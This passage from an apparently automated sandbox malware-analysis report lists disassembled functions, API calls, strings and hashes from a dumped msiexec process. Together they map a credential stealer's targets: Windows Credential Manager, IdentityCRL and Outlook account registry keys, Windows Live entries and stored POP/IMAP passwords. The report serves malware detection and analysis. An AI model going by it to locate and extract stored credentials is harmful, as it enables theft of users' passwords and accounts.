                                                                                        • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$strlen
                                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                                        • API String ID: 2619041689-3408036318
                                                                                        • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                        • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                        • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                        • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                        Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$strlen
                                                                                        • String ID:
                                                                                        • API String ID: 667451143-3916222277
                                                                                        • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                        • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                        • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                        • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                        Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                        • wcslen.MSVCRT ref: 0040874A
                                                                                        • wcsncmp.MSVCRT ref: 00408794
                                                                                        • memset.MSVCRT ref: 0040882A
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                        • wcschr.MSVCRT ref: 0040889F
                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                        • String ID: J$Microsoft_WinInet
                                                                                        • API String ID: 3318079752-260894208
                                                                                        • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                        • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                        • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                        • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                        Function 0040FB00 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 101registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                          • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                          • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                        • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                        • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                        • API String ID: 3718511928-2409096184
                                                                                        • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                        • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                        • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                        • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                        Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004037EB
                                                                                        • memset.MSVCRT ref: 004037FF
                                                                                          • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                        • strchr.MSVCRT ref: 0040386E
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                        • strlen.MSVCRT ref: 00403897
                                                                                        • sprintf.MSVCRT ref: 004038B7
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                        • String ID: %s@yahoo.com
                                                                                        • API String ID: 2240714685-3288273942
                                                                                        • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                        • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                        • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                        • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                        Function 004108A4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,?), ref: 004108C3
                                                                                        • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                        • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                        Strings
                                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromStringTaskUuidmemcpy
                                                                                        • String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
                                                                                        • API String ID: 2208953623-202910704
                                                                                        • Opcode ID: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                                                                        • Instruction ID: d39aacb0d07447bcfd979039f79cad875a94fb0475638bd6baea4f5a046d65b4
                                                                                        • Opcode Fuzzy Hash: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                                                                        • Instruction Fuzzy Hash: 6B2192B391411DAAEF11AF61DD40EEF3BACEF15354F004023F956E6211E6B8D981CBA5
                                                                                        Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                        • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                        • API String ID: 2780580303-317687271
                                                                                        • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                        • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                        • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                        • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                        Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                        • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                        • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                          • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                        • API String ID: 888011440-2039793938
                                                                                        • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                        • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                        • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                        • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                        Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • out of memory, xrefs: 0042EBEF
                                                                                        • too many attached databases - max %d, xrefs: 0042E951
                                                                                        • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                        • unable to open database: %s, xrefs: 0042EBD6
                                                                                        • database is already attached, xrefs: 0042EA97
                                                                                        • database %s is already in use, xrefs: 0042E9CE
                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                        • API String ID: 1297977491-2001300268
                                                                                        • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                        • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                        • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                        • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                        Function 00402C5D Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00402C9D
                                                                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                        • memset.MSVCRT ref: 00402CF7
                                                                                        • sprintf.MSVCRT ref: 00402D10
                                                                                        • sprintf.MSVCRT ref: 00402D4E
                                                                                          • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$sprintf$Enum
                                                                                        • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                        • API String ID: 4097761685-3814494228
                                                                                        • Opcode ID: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
                                                                                        • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                        • Opcode Fuzzy Hash: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
                                                                                        • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                        Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                        • strchr.MSVCRT ref: 0040327B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringstrchr
                                                                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                        • API String ID: 1348940319-1729847305
                                                                                        • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                        • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                        • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                        • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                        Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                        • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                        • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                        • API String ID: 3510742995-3273207271
                                                                                        • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                        • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                        • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                        • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                        Function 0040F460 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040F567
                                                                                        • memset.MSVCRT ref: 0040F57F
                                                                                          • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                        • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 78143705-3916222277
                                                                                        • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                        • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                        • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                        • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                        Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                        • memset.MSVCRT ref: 0040FA1E
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                        • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                        • String ID: WindowsLive:name=*$windowslive:name=
                                                                                        • API String ID: 945165440-3589380929
                                                                                        • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                        • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                        • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                        • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                        Function 0040F802 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 118registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040F84A
                                                                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                        • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                        • String ID: Creds$ps:password
                                                                                        • API String ID: 2290531041-1872227768
                                                                                        • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                        • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                        • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                        • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                        Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$sprintfstrchrstrlen
                                                                                        • String ID: %s@gmail.com
                                                                                        • API String ID: 3902205911-4097000612
                                                                                        • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                        • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                        • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                        • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                        Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004094C8
                                                                                        • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                        • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                        • memset.MSVCRT ref: 0040950C
                                                                                        • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                        • _strcmpi.MSVCRT ref: 00409531
                                                                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                        • String ID: sysdatetimepick32
                                                                                        • API String ID: 3411445237-4169760276
                                                                                        • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                        • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                        • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                        • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                        Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403504
                                                                                        • memset.MSVCRT ref: 0040351A
                                                                                        • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                        • _mbscat.MSVCRT ref: 0040356D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscatmemset$_mbscpystrlen
                                                                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                        • API String ID: 632640181-966475738
                                                                                        • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                        • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                        • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                        • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                        Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A47
